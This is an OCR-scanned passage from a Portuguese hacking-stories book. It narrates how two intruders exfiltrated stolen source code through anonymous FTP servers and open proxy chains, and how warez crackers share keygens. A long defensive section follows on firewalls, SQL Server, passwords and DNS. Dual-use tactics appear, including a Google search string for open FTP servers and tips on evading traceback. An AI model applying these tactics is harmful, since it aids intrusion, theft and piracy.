imaginou que, ao usar um senddor FTP anónimo, a atividade dele passaria 'na surdina', porque muitos outros tambem 
estariam usando o senddor para comercializar porno, warez (software de jogos pirateados), musica e filmes. 

O termo de busca que ele usou no Google foi o seguinte: 

index of parent incoming inurl : ftp 

Esse termo busca senddores FTP cuja configuraęao permite o acesso anónimo. Dos senddores identificados pela 
busca do Google, ele selecionou aquele que atendia a seus criterios para downloads de http, como mencionado 
anteriormente, de modo que pudesse fazer o download do código de seu browser Web. 

Com os arquivos-fonte ja transferidos da empresa para o senddor Citrix comprometido, ele entao os transferiu 
novamente para o senddor FTP anónimo que tinha localizado com a busca do Google* 

Agora faltava um ultimo passo para ele, finalmente, obter o precioso código-fonte: transferir do senddor FTP para 
seu próprio computador, Mas, "no finał do dia, nao quero ter meu endereęo na Internet fazendo download de todo esse 
código-fonte, principalmente durante horas e horas, se voce entende o que eu quero dizer". Entao, antes de transferir 
os arquivos para o senddor FTP, ele os zipou em um pacote menor, dando-lhe um nome inofensivo ("gift.zip, ou algo 
assim"). 

Mais urna vez, Robert usou urna cadeia de senddores proxy abertos para efetuar sua conexao de urna maneira que 
fosse dificil rastrea-la. Robert explica: "Ha urna centena de proxies Socks abertos só em Taiwan. E voce sabe que a 
qualquer momento talvez cem pessoas estejam usando um desses 
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proxies". Por isso, se ativaram o logging, isso torna os logs realmente muito grandes, o que significa que e 
muito improvavel que os chefoes consigam segui-lo e bater a sua porta. "Voce e como uma agulha num 
palheiro. E complicado demais." 

Finalmente, depois de todo o seu esforęo, a transmissao estava iniciada. 

Eu nem acreditava que estava fazendo o download do código para mim. Era demais. 

Compartilhando: o mundo de um cracker 

O que um hacker como Erik ou Robert faz quando obtem o cobięado software? Para ambos, como para 
outros a quem o termo 'cracker' ou 'pirata de software' se aplica, a resposta e que, na maioria das vezes, eles 
partilham o software pirateado com muitos, muitos outros. 

Mas eles o compartilham indiretamente, 

Erik explicou as etapas percorridas depois que se apossou do software do servidor que passara dois anos 
perseguindo. O aplicativo tinha sido escrito em uma linguagem de programaęao que ele nao dominava, mas 
Erik tinha um amigo que havia trabalhado como programador naquela linguagem, entao passou o código- 
fonte para gerar o destravamento ou para que o código de registro contomasse as verificaęóes de seguranęa 
de licenciamento. Acrescentou uma Graphical User Interface (GUI) em cima do gerador de chave roubado 
para disfaręar a origem do código. 

Dei-o a outra pessoa, que fez o upload do software a um dos sites Warez centrais, arquivou a 

coisa toda num pacote, inseriu o keygen e criou arquivos de informaęao [com] instruęóes sobre 

como instalar e violar o software- Eu mesmo nao o divulguei. 

Quando estava pronto para fazer o upload do programa e do keygen, eles primeiro yerificaram se alguem 
mais ja tinha violado o mesmo programa, 

Antes de voce divulgar alguma coisa, precisa ter certeza de que ninguem mais fez isso e entao 

realizar um 'dupę check' para ter certeza de que e original. 

O dupę check e facil. O cracker simplesmente acessa www.dupecheck.ru (o site esta localizado na 
Russia') e introduz o nome e a versao do produto. Se estiver na lista, isso significa que alguem mais ja o 
yiolou e o divulgou para um dos sites Warez centrais. 

Mas o fato de o software ter sido divulgado para o site nao significa que alguem possa fazer o download 
dele. De fato, o site anuncia 

HE ARE A CLOSED GROUP SO F—K OFF 


(As letras que faltam sao, eyidentemente, fomecidas no site.) 
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Por outro lado, se e um produto corrente e ainda nao consta da lista, isso significa que o cracker obteve 
uma grandę conąuista. Ele pode ser o primeiro a fazer o upload da versao yiolada 
do software. 

Uma vez feito o upload de um novo pacote, a distribuięao comeęa rapidamente, como Erik descreveu. 

E provavel que haja em torno de 50 sites Warez centrais no mundo, sites FTP 
particulares. Voce faz o upload paira um deles e aproximadamente em uma hora ele 
e replicado daąuele site para milhares de outros sites no mundo todo, por meio de 
couriers. 

Pode ser que de 50 a 200 vezes por dia — digamos cem, que e uma media muito boa. 

Cem programas por dia sao pirateados desse modo. 

Um 'courier', explica Erik, e uma pessoa que move 'a coisa' de um site cracker para outro. Os couriers sao 
o próximo nivel da cadeia alimentar dos caras que violam o software. 

Os couriers estao vendo tres ou quatro sites diferentes. Assim que alguem faz o upload [de um 
aplicativo violado) para o site Warez e eles o identificam como algo novo, fazem o download 
dele e o enviam para tres ou quatro outros sites o mais rapido possivel, antes de qualquer outra 
pessoa. 

Entao, nesse ponto, talvez haja 20 sites que o tenham. As vezes isso pode acontecer dois ou tres 
meses antes de [o novo software] chegar as lojas. 

O próximo nivel de couriers — aqueles que ainda nao ganharam acesso aos sites Warez centrais — 
identifica o novo item e passa pelo mesmo processo de download dele, e entao de upload, o mais rapido 
possivel, para o maior numero de sites possivel, para serem os primeiros. "E ele filtra dessa maneira e, em 
uma hora, aproximadamente, ja correu duas vezes o mundo." 

Algumas pessoas tern acesso a sites Warez por meio de creditos, explicou Erik. Os creditos sao um tipo 
de moeda entre os Crackers obtida pela contribuięao a missao dos sites, que e a distribuięao de software 
pirateado. O cracker normalmente supre tanto o programa quanto uma ferramenta que vai gerar chaves 
yalidas de licenęa ou algum outro tipo de tatica para a realizaęao da tarefa. 

Um cracker obtem creditos ao ser o primeiro a fazer o upload do 'crack' a um site que ainda nao o tern. 
Somente a primeira pessoa a fazer o upload a um novo aplicativo para determinado site recebe credito. 

Assim, eles ficam bastante motivados para fazer isso logo. Portanto, imediatamente, ele e yisto 
em toda parte. A essa altura as pessoas fazem cópias dele para os próprios sites crack ou 
newsgroups. 

As pessoas como eu, que yiolam essa coisa, tem sempre acesso ilimitado — se voce e um cracker, 
eles querem que voce continue contribuindo com coisas boas quando e a primeira pessoa a te- 
las. 
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Alguns sites tem rodo o programa e o keygen. "Mas muitos dos sites crack", explica Erik, "nao incluem o 
programa, somente o keygen. Para diminuir [os arquivos] e reduzir a probabilidade de que os Feds os 
fechem." 

Todos esses sites, nao apenas os sites Warez centrais* do mais alto nivel, mas tambem aqueles dois ou 
tres niveis abaixo, sao "dificeis de obter. Eles sao todos particulares", porque se um dos endereęos de site se 
toma conhecido, "os agentes federais nao o fechariam, simplesmente; eles o fechariam, prenderiam as 
pessoas, levariam todos os computadores e prenderiam qualquer um que tivesse visitado aquele site", porque 
esses sites FTP sao, afinal, depósitos de somas macięas de propriedade intelectual roubada. 

Eu nem entro mais naąueles sites. Raramente faęo isso, por causa dos riscos 
envolvidos. Vou entrar la quando precisar de algum software, mas eu mesmo nunca 
faęo upload de coisas. 

isso e mesmo muito interessante, porąue e extremamente eficiente, Quero dizer, que 
outros negócios tem um sistema de distribuięao como aquele? E todos sao motivados, 
porque todos querem alguma coisa. 

Como cracker, recebo convites para acessar todos esses sites porque todos eles 
querem bons Crackers, pois e assim que obtem mais couriers. E os couriers querem 
acesso a bons sites porque e assim que conseguem coisa boa. 

Meu grupo nao deixa novatos entrarem. Tambem ha certas coisas que nao liberamos. 

Como uma vez que liberamos o Microsoft Office, um verao, e foi arriscado demais. 

Depois disso, decidimos nunca mais mexer com nomes grandes como esse, 

Alguns caras sao muito corajosos, tornam-se realmente agressivos e vendem os CDs. 

Sobretudo quando comeęam a fazer isso por dinheiro, chamam mais a atenęao. Sao 
eles que em geral sao pegos. 

Agora, o mesmo processo que acontece com software ocorre com musica e filmes. 

Em alguns sites de filmes, voce pode ter acesso duas ou tres semanas antes de eles 
chegarem as salas de cinema. isso costuma ser obra de alguem que trabalha para um 
distribuidor ou duplicador. E sempre alguem de dentro. 

Insight 

A historia sobre a busca de Erik pelo ultimo pacote de software de servidor para completar sua coleęao 
nos da uma lięao: na natureza parece nao haver perfeięao, e isso e ainda mais verdadeiro quando os homens 
estao envolvidos. A empresa-alvo dele era muito cuidadosa com a seguranęa e tinha feito um excelente 
trabalho para proteger seus sistemas de computador No entanto, e quase impossivel deter um hacker 
competente, determinado o suficiente e disposto a dispender tempo na inyasao. Ah, sem duvida, voce tera 
bastante sorte se seus sistemas nunca forem atacados por alguem tao determinado quanto Erik ou Robert, 
disposto a dedicar uma quantidade consideravel de tempo e energia nesse esforęo. Mas o que dizer de um 
concorrente inescrupuloso, disposto a contratar uma equipe de profissionais do submundo — um grupo de 
hackers mercenarios, cada um disposto a empregar dozę ou catorze horas por dia e que adora sua atiyidade? 
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E se os atacantes encontram uma rachadura na parede, na armadura eletrónica de sua organizaęao,. o que 
acontece? Na opiniao de Erik, "ąuando alguem entra em sua rede o ąuanto eu entrei nessa rede, [voce] nunca — 
nunca mesmo — o colocara para fora. Ele estara la para sempre". Ele argumenta que "seria necessario um exame 
profundo de tudo e a mudanęa de cada senha no mesmo dia, na mesma hora, reinstalando tudo e entao assegurando 
tudo ao mesmo tempo em que ele e barrado". E voce tern de fazer tudo isso sem se esquecer de nada. "Deixe uma 
porta aberta e vou voltar a qualquer momento." 

Minhas próprias experiencias confirmam essa visao. Quando eu estava no ensino fundamental, fiz hack na 
Easynet, da Digital Equipment Corporation. Eles sabiam que havia um intruso, mas durante oito anos nem as 
melhores cabeęas do departamento de seguranęa deles conseguiram me botar para fora. Eles finalmente se livraram 
de mim — nao por esforęos seus, mas porque o govemo foi generoso o suficiente para me oferecer um pacote de 
ferias em um de seus resorts federais. 

Medidas preventivas 

Embora esses fossem ataques muito diferentes, e esclarecedor notar como muitas vulnerabilidades foram cruciais 
para o sucesso desses dois hackers e quantas medidas preventivas poderiam ser tomadas para prevenir esses ataques. 

A seguir estao as principais lięoes tiradas dessas histórias. 

Firewalls corporativos 

Os firewalls devem ser configurados de modo a permitir acesso somente a servięos essenciais, conforme exigido 
pelas necessidades de cada negócio. Uma revisao cuidadosa deve ser feita para assegurar que nenhum servięo se tome 
acessivel, exceto aqueles realmente necessarios para o negócio, Alem disso, considere usar um 'firewall de inspeęao 
stateful'*. Esse tipo de firewall fomece mais seguranęa, pois rastreia pacotes num determinado periodo de tempo. Os 
pacotes que chegam só sao permitidos em resposta a uma conexao de saida. Em outras palavras, o firewall abre seus 
portóes para determinadas porto s com base no trafego que esta saindo. E, tambem, implemente uma regra para 
controlar conexoes de rede que saem. O administrador de firewall deveria revisar periodicamente a configuraęao de 
firewall e logs para assegurar que nenhuma mudanęa nao autorizada tenha sido feita. Se qualquer hacker compromete 
o firewall, e bem provavel que ele faęa mudanęas sutis que lhe ofereęam vantagem. 

Tambem, se for adequado, considere controlar o acesso ao VPN com base no endereęo IP do cliente. isso e 
interessante no caso de um numero limitado de pessoas se conectarem a rede corporativa usando VPN. Alem disso, 
considere implementar uma forma mais segura de autenticaęao ao VPN, como cartoes inteligentes ou certificaęao de 
seguranęa, em vez de um segredo estatico partilhado. 


O tipo de transferencia stateful significa que sao guardados valores de estado cm alguma variavel ou estrutura 
de dados. Uma sessao TCP e uma conexao stateful porque o sistema mantem informaęóes sobre todo o 
histórico dessa sessao, guardando os estados em TCB's (tamanho de janela, seqiienciais, fragmentos, etc.) 
(N.da R. T.). 


IW 
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Firewalls pessoais 

Erik entrou no computador do CEO e descobriu que ele tinha um firewall pessoal instalado. E nao parou, 
visto que explorou um servięo permitido pelo firewall. Ele conseguiu enviar comandos por meio de um 
procedimento armazenado ativado pelo default no servidor SQL da Microsoft. Esse e outro exemplo de como 
explorar um servięo que o firewall nao protegia. A vitima nesse caso nunca se incomodou em examinar seus 
logs firewall volumosos, que continham mais de 500 K de atividade logged. Essa nao e a exceęao. Muitas 
organizaęoes empregam tecnologias para prevenęao e detecęao de intrusao e esperam que a tecnologia se 
autogerencie direto da caixa. Como ilustrado, esse comportamento negligente permite que um ataque 
continue intenso. 

A lięao e clara: construa com cuidado a regra de firewall para filtrar tanto o trafego de entrada quanto o 
de saida nos servięos que nao sao essenciais as necessidades do negócio, mas tambem revise periodicamente 
tanto as regras de firewall quanto os logs para detectar mudanęas nao autorizadas ou tentativas de yiolaęao a 
seguranęa. 

Depois que um hacker invade, ele provavelmente vai seqiiestrar um sistema ou urna conta de usuario 
inativos, de modo que possa voltar no futuro. Outra tatica e acrescentar priyilegios ou grupos a contas 
existentes que ja foram invadidas. Efetuar auditorias periódicas de contas, grupos e permissoes de arquivos 
do usuario e outra maneira de identificar possiveis inyasoes ou atividade nao autorizada de insiders. Ha 
inumeras ferramentas de seguranęa de dominio publico e comercial disponiveis que automatizam parte desse 
processo, Urna vez que os hackers sabem bem disso, tambem e importante verificar periodicamente a 
integridade de qualquer ferramenta relacionada a seguranęa, script e qualquer fonte de dados usados em 
conjunto. 

Muitas invas5es sao o resultado direto de configuraęoes incorretas de sistemas, como o excesso de portas 
abertas, ffacas permissoes de arquivos e servidores Web mai configurados. Quando um atacante compromete 
um sistema no nivel do usuario, o próximo passo do ataque e elevar os priyilegios, explorando 
yulnerabilidades desconhecidas ou para as quais nao foram feitos patches, e permissoes com fraca 
configuraęao. Nao se esqueęa: muitos atacantes seguem varios passos pequenos 'en route' para conseguir 
comprometer um sistema inteiro. 

Os administradores de bancos de dados que dao suporte ao Microsoft SQL Server deveriam pensar em 
desativar certos procedimentos armazenados (como xp_cmdshell, xp_makewebtask e xp_rcgread) que 
possam ser usados para dar mais acesso ao sistema. 

Varredura de porta 

Enquanto voce esta lendo este livro, e provavel que seu computador conectado com a Internet esteja 
sendo escaneado por algum fanatico que esta procurando 'o fruto facil de colher'. Como a varredura de porta e 
legał nos Estados Unidos (e na maioria dos outros paises), seu recurso contra o atacante e um pouco limitado. 
O fator mais importante e distinguir as ameaęas serias dos milhares de script kiddies que estao explorando o 
espaęo de seu endereęo na rede. 

Ha varios produtos, inclusive firewalls e sistemas de detecęao de intrusao, que identificam certos tipos de 
yarredura de porta e podem alertar o pessoal adequado sobre a atiyidade. Voce pode configurar a maior parte 
dos firewalls para identificar a yarredura de porta e regular a conexao de acordo. Varios produtos comerciais 
de firewall tern opęoes de configuraęao para impedir a rapida yarredura 
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de porta. Ha tambem ferramentas 'de fonte aberta, que podem identificar yarreduras de porta e remover pacotes durante 
certo periodo de tempo. 

Conheęa o seu sistema 

Inumeras tarefas de gerenciamento de sistemas deveriam ser executadas para fazer o seguinte: 

• Inspecionar a lista de processo para qualquer processo incomum ou desconhecido. 

• Examinar a lista de programas pianejados para qualquer adięao ou mudanęa nao autorizada. 

• Verificar o sistema de arquivo, procurando binarios de sistema, Scripts ou programas de aplicativos novos e 
modificados. 

• Pesquisar qualquer reduęao incomum no espaęo livre do disco. 

• Conferir se todo o sistema ou se as contas de usuario estao ativas atualmente e remover contas inativas ou 
desconhecidas. 

• Verificar se as contas especiais instaladas por default estao configuradas para negar logins interativos ou de 
rede. 

• Verificar se os diretórios de sistema e arquivos tern permissoes adequadas de acesso ao arquivo. 

• Checar os logs de sistema para qualquer atividade estranha (como acesso remoto de origens desconhecidas 
ou em horarios incomuns durante a noite ou no firn de semana). 

• Fazer urna auditoria de logs do seryidor Web para identificar qualquer solicitaęao que acesse arquivos nao 
autorizados. Os atacantes, conforme ilustrado neste capitulo, copiarao arquivos para um diretório do 
seryidor Web e farao download do arquivo via Web (HTTP). 

• Com os ambientes do seryidor Web que empregam FrontPage ou WebDav, assegurar que as permissoes 
apropriadas estejam instaladas para impedir o acesso de arquivos por usuarios nao autorizados. 

Resposta acidental e de alerta 

Saber quando um acidente de seguranęa esta acontecendo pode ajudar a controlar danos. Ative a auditoria do 
sistema operacional para identificar potenciais yiolaęoes de seguranęa. Empregue um sistema automatizado para 
alertar o administrador de sistema quando certos tipos de eventos de auditoria ocorrerem. Entretanto, notę que, se um 
atacante obtem priyilegios suficientes e se toma ciente da auditoria, esse sistema de alerta automatizado pode ser 
contomado. 

Detectando mudanęas autorizadas em aplicativos 

Robert pode substituir o aplicativo helpdesk.exe explorando urna ma configuraęao com FrontPage de autoria. 
Depois de obter o código-fonte do produto que e o carro-chefe da empresa, ele deixou sua versao 'hacked' do 
aplicativo helpdesk para que pudesse voltar posteriormente. Um administra-dor de sistemas sobrecarregado pode nao 
perceber nunca que um hacker modificou secretamente um programa em especial se nao sao feitas yerificaęoes de 
integridade. Urna altematiya a yerificaęoes manuais e licenciar um programa como o Tripwire', que efetua 
automaticamente o processo de detecęao de mudanęas nao autorizadas. 

Permissoes 

Erik foi capaz de obter senhas confidenciais de bancos de dados vendo arquivos no diretório/ includes. Sem essas 
senhas iniciais, sua missao poderia ter sido mais dificil. Dispor das senhas de 
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bancos de dados sigilosos expostas num arquivo-fonte que possa ser lido no mundo todo era tudo de que ele 
precisava para entrar. A melhor pratica de seguranęa e evitar armazenar qualquer senha exclusivamente de texto 
em arquivos batch, fonte ou script. Deveria ser adotada, na empresa toda, urna politica que proibisse o 
armazenamento de senhas de texto, a nao ser que fosse absolutamente necessario. No minimo, os arquivos com 
senhas nao-criptografadas devem ser protegidos com cuidado para impedir que sejam reveladas de maneira 
incidental. 

Na empresa que Robert estava atacando, o servidor IIS4 Microsoft nao tinha sido configurado de modo 
adequado para impedir que usuarios anónimos ou convidados lessem e escrevessem arquivos ao diretório do 
servidor Web. O arquivo de senha externa usado em conjunto com o Microsoft Visual SourceSafe podia ser lido 
por qualquer usuario conectado ao sistema. Em virtude dessas falhas de configuraęao, o atacante conseguiu 
ganhar pleno controle do dominio Windows do alvo. Empregar sistemas com urna estrutura organizada de 
diretório para aplicativos e dados provavelmente aumentara a eficiencia dos controles de acesso. 

Senhas 

Alem das outras sugestóes comuns de gerenciamento de senhas descritas em todo o livro, o sucesso dos 
atacantes neste capitulo destaca alguns pontos adicionais importantes. Erik comentou que conseguiu prever como 
outras senhas da empresa seriam construidas com base nas senhas que conseguiu invadir Se a sua empresa 
esta usando urn metodo padronizado, previsivel, deve ficar claro que voce esta deixando sua porta aberta aos 
hackers. 

Depois que urn atacante obtem acesso privilegiado a urn sistema, conseguir senhas de outros usuarios ou 
bancos de dados e urna tarefa de alta prioridade. Tais taticas, como procurar no e-mail ou em todo o sistema de 
arquivos por senhas de texto, e-mails, Scripts, arquivos batch, includes de código-fonte e planilhas, sao bastante 
comuns. 

As organizaęóes que usam o sistema operacional Windows deveriam considerar a possibilidade de configura- 
lo de modo que os hashes de senha do LAN Manager nao sejam armazenados no registro. Se urn atacante obtem 
direitos de acesso administrativo, ele pode extrair os hashes de senha e tentar invadi-los. O pessoal de Tl pode 
configurar com facilidade o sistema, de modo que os hashes antigos nao sejam armazenados, aumentando de 
maneira substancial a dificuldade de invadir as senhas. Entretanto, urna vez que urn atacante 'tern' sua caixa, ele 
pode farejar (sniff) o trafego de rede ou instalar urna senha adicional de terceiros para obter senhas da conta. 

Urna alternativa para desligar os hashes de senha do LAN Manager e construir senhas com urn conjunto de 
caracteres nao disponiveis no teclado, usando a tecla <Alt> e o identificador numerico do caractere, como descrito 
no Capitulo 6. Os programas amplamente usados para invadir senhas nao tentam fazer isso usando caracteres 
dos alfabetos grego, hebreu, latino e arabico. 

Aplicativos de terceiros 

Usando ferramentas personalizadas para escanear a Web, Erik descobriu urn arquivo log nao protegido, 
gerado por urn produto comercial FTP. O log continha toda a informaęao da trajetória para arquivos que eram 
transferidos do sistema e para ele. Nao conte com configuraęóes-padrao 
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ao instalar software de terceiros. Implemente a configuraęao que tenha menos probabilidade de vazar 
informaęoes yaliosas, como dados de arquivo que podem ser usados para atacar ainda mais a rede. 

Protegendo shares 

Empregar shares de rede e um metodo comum de partilhar arquivos e diretórios em urna rede corporativa. 
Os funcionarios de TI podem decidir nao atribuir senhas nem acessar controle a shares de rede porque os 
shares só sao acessiveis na rede interna. Como foi mencionado em todo o livro, inumeras organizaęoes 
concentram seus esforęos na manutenęao da boa seguranęa do perimetro, mas falham em garantir o lado 
interno da rede. Como Robert, os atacantes que entrarem em sua rede buscarao shares com nomes que 
prometam informaęoes yaliosas, confidenciais. Nomes descritiyos como 'pesquisa' ou 'backup' só tomam a 
tarefa de um atacante bem mais facil. A melhor pratica e proteger adequadamente todos os shares de rede 
que contem informaęoes confidenciais. 

Impedindo adivinhaęóes do DNS 

Robert usou um programa para adiyinhar o DNS a firn de identificar possiveis hostnames dentro de um 
arquivo de zona publicamente acessivel. Voce pode impedir a revelaęao de hostnames intemos 
implementando o que e conhecido como split-horizon DNS, que tern tanto um nome de seryidor interno 
quanto de um extemo. Só hosts publicamente acessiveis sao mencionados no arquivo de zona do seryidor de 
nome extemo. O seryidor de nome interno, muito mais bem protegido de ataques, e usado para resolver 
solicitaęóes intemas do DNS para a rede corporativa. 

Protegendo servidores SQL da Microsoft 

Erik descobriu um backup de correio eletrónico e um seryidor Web que usavam o Microsoft SQL Server 
em que o nome da conta e a senha eram os mesmos que aqueles identificados nos arquivos 'include' do 
código-fonte. O seryidor SQL nao deveria ter sido exposto a Internet sem que a empresa tivesse necessidade 
disso. Embora a conta 's' fosse renomeada, o atacante identificou o novo nome de conta e a senha em um 
arquivo nao protegido de código-fonte. A melhor pratica e filtrar a porta 1433 (Microsoft SQL Server), a 
menos que isso ja seja urna exigencia absoluta. 

Protegendo arquivos confidenciais 

Os principais ataques deste capitulo foram bem-sucedidos no finał porque o código-fonte estava 
armazenado em seryidores que nao tinham seguranęa adequada. Em ambientes muito confidenciais como o 
de P&D ou o do grupo de desenvolvimento de urna empresa, outro nivel de seguranęa poderia ser provido 
empregando-se tecnologias criptografadas. 

Outro metodo para um unico desenvolvedor (mas provavelmente nada pratico em um ambiente de 
equipe, em que inumeras pessoas solicitam acesso ao código-fonte do produto em desenvolvimento) seria 
criptografar dados extremamente sigilosos como um código-fonte com produtos como o PGP Disk ou o PGP 
Corporate Disk. Esses produtos criam discos criptografados yirtuais de um modo que toma o processo 
transparente ao usuario. 
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Protegendo backups 

Como ficou claro nessas histórias, e facil para os funcionarios — mesmo para aąueles que sao bastante 
conscientes de ąuestoes de seguranęa — ignorar a necessidade de proteger arquivos de backup, inclusive de e-mail, 
de serem lidos por pessoal nao autorizado. Durante minha formaęao como hacker, descobri que muitos 
administradores de sistemas deixavam desprotegidos os arquivos comprimidos de diretórios sigilosos. E, enquanto 
trabalhei no departamento de TI de um hospital importante, notei que o banco de dados da folha de pagamento 
costumava ter backup que era dekado sem nenhuma proteęao de arquivo — de modo que qualquer membro do 
quadro de funcionarios que entendesse de computaęao poderia acessa-lo. 

Robert tirou vantagem de outro aspecto desse descuido quando encontrou backups do código-fonte ao aplicativo 
de mailing list comercial deixados em um diretório acessivel publicamente no servidor Web. 

Protegendo se contra ataques de injeęao do MS SQL 

Robert removeu propositadamente verificaęoes de validaęao de entrada do aplicativo baseado na Web que 
deviam impedir sua organizaęao de ser atacada usando o mesmo tipo de truque que Robert conseguiu usar: 

• Nunca execute um servidor Microsoft SQL sob o contexto do sistema. Considere executar o servięo de 
servidor SQL num contexto de conta diference. 

• Ao desenvolver programas, escreva um código que nao gere solicitaęoes de SQL dinamicas. 

• Use procedimentos armazenados para executar solicitaęoes SQL. Determine urna conta que seja usada 
apenas para executar esses procedimentos e configure as permissoes nela para realizar as tarefas 
necessarias. 

Usando servięos VPN da Microsoft 

Como meio de autenticaęao, o VPN da Microsoft usa autenticaęao do Windows, facilitando a um atacante a 
exploraęao de senhas fracas para ganhar acesso ao VPN. Pode ser adequado, em certos ambientes, exigir autenticaęao 
do cartao inteligente para acesso ao VPN — outro lugar onde urna forma mais forte de autenticaęao que nao um 
segredo partilhado dificultara um pouco esse processo. Tambem, em alguns casos, pode ser adequado controlar o 
acesso ao VPN com base no endereęo IP do cliente. 

No ataque de Robert, o administrador de sistema deveria estar monitorando o servidor VPN para qualquer 
usuario novo acrescentado ao grupo VPN. Outras medidas, tambem mencionadas anteriormente, incluem a remoęao 
de contas inativas do sistema, assegurando que haja um processo para remover ou desativar contas de funcionarios 
que sairam da empresa e, quando for pratico, restringir o VPN e o acesso dial-up pelo dia da semana e hora do dia. 

Removendo arquivos de instalaęao 

Robert conseguiu obter as listas de mailing que estava procurando nao pela exploraęao do aplicativo do mailing 
list, mas tirando vantagem da vulnerabilidade do script de instalaęao default do aplicativo. Urna vez que um 
aplicativo foi instalado com sucesso, os Scripts de instalaęao deveriam ser removidos. 
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Renomeando contas do administrador 

Qualquer pessoa que se conecte com a Internet pode simplesmente procurar no Google "listas de senhas- 
padrao" para encontrar sites que listam contas e senhas no estado-padrao, conforme expedidas pelo fabricante. 
Por isso, e uma boa ideia renomear as contas do convidado e do administrador quando possivel. isso nao tern 
valor, a nao ser quando o nome e a senha da conta sao armazenados de maneira clara, como foi o caso da 
empresa descrita no ataque de Erik. 4 

Reforęando o Windows para evitar o armazenamento de certas credenciais 

A configuraęao-padrao do Windows armazena automaticamente hashes de senha em caches, alem de senhas 
de texto usadas para a conexao de rede. Depois de obter privilegios suficientes, urn atacante tentara extrair o 
maximo possivel de informaęoes, inclusive qualquer senha que seja armazenada no registro ou em outras areas 
do sistema. 

Urn insider confiavel pode comprometer todo urn dominio usando urn pouco de engenharia social quando sua 
estaęao de trabalho armazenar localmente as senhas em cache. Nosso insider descontente liga para o suporte 
tecnico, reclamando que nao consegue se ligar a sua estaęao de trabalho. Ele quer que urn tecnico va 
imediatamente Ihe dar assistencia. A pessoa aparece, liga o sistema usando suas credenciais e resolve o 
'problema'. Logo depois, o insider extrai o hash de senha do tecnico e o invade, dando ao funcionario acesso aos 
mesmos direitos do administrador do dominio que o tecnico tern. (Esses hashes armazenados em cache sao 
double-hashed; logo, e necessario outro programa para desemaranhar e violar esses tipos de hashes.) 

Inumeros programas, como o Internet Explorer e o Outlook, armazenam senhas no registro. Para aprender 
mais sobre como desativar essa funcionalidade, use o Google para buscar 'desativar o cache de senhas'. 

Defesa profunda 

As histórias contadas neste capitulo demonstram, de modo ainda mais evidente que outras no livro, que 
manter em seguranęa apenas o perimetro eletrónico da rede de sua empresa nao basta. No ambiente de hoje, 
esse conceito esta sendo superado a medida que as empresas convidam usuarios para entrar em sua rede. Assim, 
o firewall nao vai impedir todo ataque. O hacker vai procurar a rachadura na parede, tentando explorar urn servięo 
que seja permitido pelas regras do firewall. Uma estrategia para atenuar isso e colocar qualquer sistema acessivel 
publicamente em seu próprio segmento de rede e filtrar com cuidado o trafego em segmentos de rede mais 
sensiveis. 

Por exemplo, se urn servidor SQL backend esta na rede corporativa, urn segundo firewall pode ser instalado 
para permitir apenas conexoes na porta que executa o servięo. Instalar firewalls internos para proteger ativos de 
informaęao sigilosos pode parecer incomodo, mas deve ser considerado essencial se voce tern realmente a 
intenęao de proteger seus dados de insiders maliciosos e de invasores externos que conseguem violar o 
perimetro- 

O resultado 

Nada conseguira impedir os invasores persistentes de atingir seus objetivos. Eles vao cercar a rede-alvo, 
observando todos os sistemas acessiveis e respectivos servięos que sao expostos publica- 
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mente. O hacker pode aguardar durante semanas, meses ou mesmo anos para encontrar e explorar uma nova 
vulnerabilidade que nao foi atacada. Nos meus tempos de hacker, eu passava horas a fi o tentando comprometer 
sistemas. Minha persistencia compensava, visto que sempre conseguia encontrar aquela rachadura na parede. 

O hacker Erik demonstrou a mesma persistencia e determinaęao em seus esforęos para obter o código-fonte, um 
premio extremamente alto, num periodo de dois anos. E Robert tambem empreendeu uma serie complexa e intrincada 
de medidas tanto em seus esforęos obsessivos de roubar milhoes de endereęos de e-mail para vender aos spammers, 
quanto em seu esforęo, do mesmo modo que Erik, de obter o código-fonte que tinha como alvo, 

Entenda que esses dois hackers nao estao, de modo algum, sozinhos. O nivel de persistencia deles nao e 
incomum na comunidade hacker. As pessoas responsaveis por assegurar a infra-estrutura de uma organizaęao devem 
entender contra o que poderiam estar lutando. Um hacker tern um tempo ilimitado para encontrar apenas um furo, 
enquanto os administradores sobrecarregados de sistemas e redes tern um tempo muito limitado para focalizar a tarefa 
especifica de reforęar as defesas da organizaęao. 

Como Sun Tzu escreveu de modo tao eloquente em A arte da guerra: "Conhece a ti mesmo e conhece a teu 
inimigo; numa centena de batalhas tu nunca estaras em perigo. Quando tu ignoras o inimigo, mas conheces a ti 
mesmo, tuas chances de vencer ou perder sao iguais...". A mensagem e clara: seus adversarios gastarao o tempo que 
for necessario para conseguir o que querem. Assim, voce deve fazer uma avaliaęao de risco para identificar as 
provaveis ameaęas contra sua organizaęao, e essas ameaęas deverao ser levadas em conta enquanto voce estiver 
desenvolvendo uma estrategia de seguranęa. Estar bem preparado e praticar um "padrao de cuidados devidos', 
fazendo um pianej amento preliminar, implementando e exigindo o cumprimento de politicas de seguranęa de 
informaęao ajudarao em muito a manter os hackers a distancia. 

Para dizer a verdade, qualquer adversario com recursos suficientes pode, por firn, entrar, mas seu objetivo deveria 
ser dificultar e tomar isso um desafio, a ponto de nao valer a pena perder tanto tempo. 

Notas 

1. Interessado em ver seus próprios segredos LSA e areas de armazenamento protegidas? Voce só precisa de uma 
ferramenta eficaz chamada Cain & Abel, disponivel em www.oxid.it 

2. Esse site nao esta mais acessivel, mas ha outros que o substituiram. 

3. Mais informaęóes sobre Tripwire estao disponiveis em www.tripwire.com . 

4. Um site muito usado pelos hackers para verificar locaęóes com senhas-padrao e www.phenoelit.de/dpl/dpl. htm. 
Caso sua empresa esteja na lista, fique atento. 
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Voce ve algumas informaęoes e a maneira como as coisas sao formuladas, e 
entao comeęa a ter alguma compreensao da empresa e das pessoas responsaveis 
pelos sistemas de TI. E havia essa ideia de que entendiam de seguranęa, mas 
talvez estivessem fazendo alguma coisa meio errada. 

Louis 


No comeęo do Capitulo 8, avisamos que os leitores sem conhecimentos tecnicos achariam algumas partes 
deste livro dificeis de acompanhar isso e ainda mais verdadeiro neste capitulo. Mesmo assim, seria uma pena 
deixar de filiar sobre o assunto, visto que a historia e fascinante em muitos sentidos. E a parte principal 
pulando os detalhes tecnicos, pode ser acompanhada facilmente. 

Esta e uma historia sobre pessoas que tern o mesmo modo de pensar e trabalham para uma empresa que 
foi contratada para fazer o hack de um alvo sem ser pega. 

Em algum lugar em Londres 

O cenario e a 'Cidade', no coraęao de Londres. 

Imagine 'um galpao sem janelas, sem divisoes, no fundo de um edificio, com um grupo de tecnicos se 
reunindo'. Pense nos 'hackers distantes da sociedade, que nao sao influenciados pelo mundo la fora', cada um 
